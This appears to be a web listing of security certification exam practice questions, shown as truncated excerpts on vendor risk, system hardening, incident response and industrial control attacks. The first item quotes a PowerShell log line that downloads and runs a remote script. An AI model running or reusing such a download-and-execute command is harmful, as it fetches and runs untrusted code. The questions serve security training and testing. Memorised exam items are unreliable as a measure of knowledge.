Which of the following security controls would have alerted and prevented the next phase of the attack?

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have...

September 6, 2022

Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very...

September 6, 2022

Which of the following categories BEST describes this type of vendor risk?

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? A. SDLC...

September 6, 2022

Which of the following describes the administrator’s discovery?

An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access. Which of the following describes the administrator’s discovery? A. A vulnerability B. A threat C. A breach D. A risk Answer:...

September 5, 2022

Which of the following should the incident response team perform to understand the crash and prevent it in the future?

The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified. Which of the following should the incident response team perform to understand the crash and prevent it in the future? A. Root...

September 5, 2022

Which of the following security responsibilities will the DevOps team need to perform?

A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms B. Patch the infrastructure at the operating system C...

September 5, 2022

Which of the following would be the BEST solution to harden the system?

A security engineer is hardening a company’s multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: 22, 25, 110, 137, 138, 139, 445. Internal Windows clients are used to transferring files to the server to stage them for customer download as part...

September 5, 2022

Which of the following historian server locations will allow the business to get the required reports in an and IT environment?

An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports. Which of the following historian server locations will allow the business to get the required reports in an and...

September 5, 2022

Which of the following threat actors is MOST likely involved?

A company security engineer arrives at work to face the following scenario: 1) Website defacement 2) Calls from the company president indicating the website needs to be fixed immediately because it is damaging the brand 3) A job offer from the company's competitor 4) A security analyst's investigative report, based...

September 5, 2022

Which of the following is the MOST likely security consequence of this attack?

An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A. A turbine would overheat...

September 4, 2022